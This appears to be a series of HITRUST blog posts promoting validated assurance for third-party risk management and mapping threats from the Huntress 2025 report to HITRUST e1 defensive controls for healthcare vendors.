Validated assurance is the new standard for third-party trust, providing verified, benchmarked, and quality-controlled proof of security that replaces manual, self-attested processes. It enables organizations to assess, monitor, and trust vendors with confidence, reducing complexity while increasing transparency across the entire third-party ecosystem.

In our previous post, we explored why traditional third-party risk management (TPRM) models are breaking down, burdened by inefficiency, inconsistency, and incomplete assurance. Now, let’s understand the solution: validated assurance.

What is validated assurance — and why does it matter?

Validated assurance is a model that proves security and compliance, instead of just claiming it. It relies on independent verification, standardized frameworks, and centralized quality assurance to deliver consistent, defensible evidence of a vendor’s cybersecurity and privacy posture.

In short, validated assurance means you don’t have to take a vendor’s word for it. Their controls have been tested, verified, and approved against a trusted, recognized standard.

This approach solves a critical problem for both organizations evaluating vendors and vendors being assessed. It replaces unverified, inconsistent evidence with transparent, comparable results that everyone can trust.

How does validated assurance fix the gaps in traditional TPRM?

Traditional third-party risk management relies on subjective, manual, and often redundant processes. It creates friction among risk teams and vendors. Validated assurance replaces this with standardization, evidence, and scalability.

With validated assurance, organizations move from reactive oversight to proactive confidence, reducing both operational overhead and uncertainty.

How does HITRUST operationalize validated assurance?

HITRUST pioneered validated assurance by building it into every layer of its ecosystem.

• A unified framework

At the foundation is the HITRUST Framework, which harmonizes over 60 global regulations, standards, and best practices into one comprehensive control library. This ensures alignment across multiple requirements.

• Tiered assurance (e1, i1, r2)

Not all vendors require the same level of scrutiny. HITRUST’s tiered assessment model (e1,i1,r2) scales rigor to vendor criticality. This flexibility helps organizations evaluate vendors appropriately without sacrificing consistency.

• Centralized quality assurance

Every validated assessment undergoes a centralized QA review by HITRUST, ensuring each certification meets the same defensibility and quality standards, making the results uniformly reliable.

• Threat-adaptive updates

The HITRUST Framework evolves frequently to keep pace with emerging threats, vulnerabilities, and regulatory changes. This threat-adaptive model ensures that vendor assessments remain aligned with the latest risk environment.

• Automation and interoperability

Through integrations with platforms like ServiceNow via the HITRUST TPRM Services (formerly known as HITRUST Assessment XChange), validated assurance becomes scalable. Organizations can automate evidence reuse, monitor vendor status in real time, and streamline reporting.

• Standardized control set

With standardized controls, HITRUST enables organizations to develop efficiencies as they know exactly which controls were tested.

Who benefits from validated assurance?

Validated assurance is a win-win for both sides of the third-party risk equation.

Assessing organizations:

• Gain verified, comparable assurance across vendors.
• Reduce assessment time and resource strain.
• Build defensible confidence for boards, regulators, and auditors.

Vendors:

• Demonstrate security maturity once and reuse the certification multiple times.
• Reduce audit fatigue from repetitive questionnaires.
• Accelerate sales cycles with trusted, independently verified assurance.

In essence, validated assurance creates a shared ecosystem of trust, where proof replaces promises, and efficiency replaces redundancy.

What’s next?

The transition to validated assurance is more than an operational upgrade. It’s a strategic evolution.

Explore how validated assurance transforms third-party oversight into a measurable, defensible, and scalable model of trust in our new white paper: Redefining Third-Party Risk Management with the HITRUST Validated Assurance.

Traditional third-party risk management (TPRM) practices may not keep pace as they often rely on manual, self-attested, and inconsistent methods. As vendor ecosystems expand and the frequency and cost of breaches rise, organizations need a new approach — one built on verified, standardized, and defensible assurance like that offered by HITRUST.

What’s driving the third-party risk crisis?

The modern enterprise depends on thousands of third parties for everything from IT infrastructure to cloud services and data processing. According to SecurityScorecard and Cyentia 2024, the average Global 2000 organization now manages over 8,000 vendors providing nearly 18,000 IT products and services, each representing a potential point of risk.

The impact is real.

• 99% of Global 2000 organizations are connected to vendors that have experienced a cyber incident.

• The average third-party breach costs $4.91 million (IBM 2025).

These numbers reveal a growing truth: Cybersecurity risk associated with the supply chain has become material to an enterprise. Even a single weak link can expose the entire ecosystem to breach and disruption.

Why is traditional TPRM challenging?

Legacy TPRM programs were designed for a simpler, slower world. Today, they rely on outdated processes that create friction, delay, and false confidence.

These inefficiencies leave teams overwhelmed and unable to keep pace with expanding vendor ecosystems. Instead of reducing risk, traditional TPRM often becomes an administrative burden that delays procurement and frustrates vendors.

What happens when TPRM becomes a bottleneck?

For most enterprises, the TPRM process has turned into a roadblock. Assessments can take weeks or months, draining staff resources and stalling business. Vendors often repeatedly fill out lengthy questionnaires for every customer, creating frustration on both sides.

The result?

• Procurement delays
• Slower time-to-market for services that depend on vendors
• Inconsistent risk visibility across vendors
• Friction with vendors forced to repeat assessments

In short, traditional TPRM may create more noise than insight, leaving organizations vulnerable to the very risks they’re trying to mitigate.

What’s the better way to manage third-party risk?

Security-mature organizations are shifting from self-attested trust to validated assurance — a model that uses verified, standardized, and quality-controlled assessments to prove that vendor controls are effective.

Validated assurance eliminates redundancy, improves consistency, and provides defensible, audit-ready proof of compliance. Rather than taking vendors at their word, organizations gain confidence from independently verified results.

With validated assurance

• Risk decisions are based on evidence, not assumptions.
• Vendor reviews are faster and reusable.
• Security teams spend less time chasing documentation and more time managing risk.

It’s not just a better way to assess. It’s a smarter way to trust.

How can you learn more?

To understand how validated assurance transforms vendor oversight from a reactive burden into a scalable model of trust, download our latest white paper: Redefining Third-Party Risk Management with the HITRUST Validated Assurance.

Learn how HITRUST empowers organizations to address the challenge of vendor risk management and stay resilient against the growing wave of third-party breaches.

Takeaways

• Healthcare remains a top target for cyberattacks: Cybercriminals are intensifying attacks against healthcare organizations due to valuable patient data and outdated systems.
• Vendors are the new attack vector: Even the most secure organizations can be compromised through a trusted third party.
• HITRUST e1 provides proven protection: The HITRUST e1 offers a pragmatic, standardized way to verify that both organizations and their vendors have implemented critical cybersecurity controls to prevent, detect, and respond to today’s most prevalent threats.

Overview

The Huntress 2025 Cyber Threat Report analyzes attacks observed in 2024, showing that cybercriminals are repurposing sophisticated techniques for small and mid‑sized organizations. Healthcare was hit particularly hard because it holds valuable patient data and often relies on outdated systems. Threat actors frequently used malicious scripts, remote access Trojans (RATs), remote‑monitoring tool abuse, and ransomware. These patterns highlight the need for comprehensive security measures across the entire supply chain. One major risk associated with these attacks is that the threat actor may compromise enterprise systems via a third party. For example, any of your hundreds of software providers may be compromised by these attacks and used as a stepping stone into your customers’ environments.

Key threats and relevant e1 controls

Malicious scripts and fileless malware

• What Huntress saw: Malicious script executions were the most common attack vector in healthcare. Attackers used PowerShell or JavaScript to persist on hosts, modify the Windows Registry, or download additional malware.
• e1 controls: Deploy endpoint protection tools that can detect and block script‑based attacks and fileless malware. Enforce default‑deny rules on host‑based firewalls to prevent unauthorized outbound connections. Keep systems patched and configurations hardened to reduce exploitable vulnerabilities. Prohibit installation of unauthorized software and disable auto‑run features to limit untrusted code execution. Perform regular vulnerability scans and implement an incident response plan to catch and remediate malicious activity quickly.

Infostealers and credential harvesting

• What Huntress saw: Infostealers targeted healthcare to extract PHI and credentials. More than 38 % of hands‑on‑keyboard activity involved network or domain reconnaissance, and attackers used tools such as Mimikatz to dump cached credentials.
• e1 controls: Enforce strong password policies and change default credentials on all systems. Require multi‑factor authentication for privileged accounts and remote access to limit the impact of stolen passwords. Review account privileges regularly, limit administrative rights, and use separate accounts for administrative duties. Enable comprehensive logging and protect audit trails to support investigation of credential misuse. Provide ongoing security awareness and phishing‑resistance training so staff recognize and report credential‑stealing attempts.

Ransomware, data theft, and extortion

• What Huntress saw: Ransomware in healthcare shifted toward data theft and extortion. Attackers combined data exfiltration with encryption to coerce victims, and the rise in cryptocurrency prices emboldened them.
• e1 controls: Maintain offline or immutable backups and test restoration procedures regularly. Establish a robust incident response capability that includes detection, containment, and recovery. Limit access to sensitive data to authorized personnel and encrypt data on mobile devices. Use email and web‑filtering technologies to block phishing emails and connections to known malicious domains.

Remote Access Trojans (RATs) and RMM abuse

• What Huntress saw: Attackers deployed Java‑based RATs (such as JRat and Adwind) and abused legitimate remote monitoring tools.
• e1 controls: Secure remote access with multi‑factor authentication and restrict the use of remote administration tools to authorized solutions. Segment networks with firewalls to separate internal systems from external networks and limit lateral movement. Maintain an accurate inventory of IT assets and forbid installation of unauthorized software, including unauthorized RMM tools. Configure devices to log off idle sessions automatically and assign unique user accounts to all personnel.

Lateral movement and network enumeration

• What Huntress saw: Attackers spent significant time mapping networks and domains. They used toolkits (e.g., ntdsutil, diskshadow) to dump credentials and move laterally, often exploiting legacy systems.
• e1 controls: Apply least‑privilege principles; only authorized individuals should have administrative rights, and privileged activities should be logged and reviewed. Use network segmentation and host‑based firewalls to restrict inter‑segment traffic and make lateral movement more difficult. Perform regular asset inventories and vulnerability scans to identify legacy systems and misconfigurations. Enforce change‑control procedures and maintain baseline configurations to prevent unauthorized changes. Collect and retain audit logs so lateral movement can be detected and investigated.

Why vendor compliance with e1 requirements matters

The Huntress report shows that attackers exploit weaknesses not just in their primary targets but also in connected systems. Vendors often have direct network access or handle sensitive data on behalf of clients. If a vendor neglects patching, uses weak credentials, or does not enforce multi‑factor authentication, it can become the entry point for the same malicious scripts, infostealers, or remote‑access abuse described above.

Requiring vendors to adhere to the e1 requirements offers assurance that they implement comprehensive controls across governance, technical, and operational domains. These controls include endpoint security, firewalls, strong authentication, least‑privilege access, incident response, and employee training. Mandating an e1 certification in vendor contracts reduces third‑party risk, demonstrates due diligence, and aligns the entire ecosystem to best practices.

Conclusion

The 2025 Huntress report underscores the evolving threats facing healthcare organizations, from malicious scripts and infostealers to ransomware and lateral movement. The e1 requirements provide a structured set of practices that collectively mitigate these threats by addressing technical vulnerabilities, human factors, and incident response readiness. Organizations should not only implement these controls internally but also require their vendors to meet them. Doing so builds a resilient defense that protects patient data and ensures continuity of care in the face of an increasingly aggressive threat landscape.